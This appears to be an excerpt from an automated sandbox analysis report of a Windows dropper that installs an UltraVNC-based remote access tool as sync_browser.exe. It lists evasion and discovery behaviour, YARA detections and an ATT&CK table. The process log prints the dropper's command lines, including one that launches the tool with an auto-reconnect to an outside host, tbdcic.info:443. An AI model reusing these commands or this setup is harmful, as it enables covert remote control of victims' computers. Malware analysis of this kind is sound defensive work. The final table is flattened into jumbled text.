                          Source: C:\Windows\SysWOW64\timeout.exe TID: 2984Thread sleep count: 65 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8080Thread sleep count: 33 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 2320Thread sleep count: 359 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 2320Thread sleep time: -35900s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 3756Thread sleep count: 368 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 3756Thread sleep time: -36800s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 652Thread sleep count: 369 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 652Thread sleep time: -36900s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6064Thread sleep count: 294 > 30
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Tasks\sync_browser.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,22_2_00007FF67E7C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,22_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,22_2_00007FF67E7EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,22_2_00007FF67E87A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,25_2_00007FF67E7C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,25_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,25_2_00007FF67E7EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,25_2_00007FF67E87A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,22_2_00007FF67E7E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7C6060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,22_2_00007FF67E7C6060
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 00000019.00000002.1537006300.000000000112B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 00000016.00000002.3193034089.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF67E8847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D26B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,22_2_00007FF67E7D26B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E829BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,22_2_00007FF67E829BC0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF67E8847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E877220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF67E877220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00007FF67E8847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 25_2_00007FF67E877220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00007FF67E877220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe25_2_00007FF67E829BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D37E0 GetVersionExA,GetEnvironmentVariableA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,SetFileAttributesA,GetEnvironmentVariableA,GetForegroundWindow,ShellExecuteExA,22_2_00007FF67E7D37E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,22_2_00007FF67E7D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7E4D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,22_2_00007FF67E7E4D7E
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmdJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E7D7B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,22_2_00007FF67E7D7B90
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                          Source: WPSela.LSZr7V.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                          Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Program Manager
                          Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Shell_TrayWnd
                          Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Progman
                          Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E829EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,22_2_00007FF67E829EF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 22_2_00007FF67E87DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,22_2_00007FF67E87DF80
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721
                          Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 22.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7q551ugrWe.exe PID: 7404, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 2624, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 22.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 25.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7q551ugrWe.exe PID: 7404, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 2624, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED
                          Source: sync_browser.exe, 00000016.00000002.3193216128.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts
                          11
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          Exploitation for Privilege Escalation
                          1
                          Disable or Modify Tools
                          121
                          Input Capture
                          2
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          1
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          Native API
                          1
                          Valid Accounts
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol1
                          Screen Capture
                          12
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          11
                          Windows Service
                          1
                          Valid Accounts
                          2
                          Obfuscated Files or Information
                          Security Account Manager1
                          System Service Discovery
                          SMB/Windows Admin Shares121
                          Input Capture
                          1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          1
                          Scheduled Task/Job
                          11
                          Access Token Manipulation
                          1
                          Timestomp
                          NTDS4
                          File and Directory Discovery
                          Distributed Component Object Model3
                          Clipboard Data
                          1
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution
                          1
                          Bootkit
                          11
                          Windows Service
                          1
                          DLL Side-Loading
                          LSA Secrets26
                          System Information Discovery
                          SSHKeylogging2
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                          Process Injection
                          231
                          Masquerading
                          Cached Domain Credentials41
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job
                          1
                          Valid Accounts
                          DCSync1
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Virtualization/Sandbox Evasion
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Access Token Manipulation
                          /etc/passwd and /etc/shadow11
                          Application Window Discovery
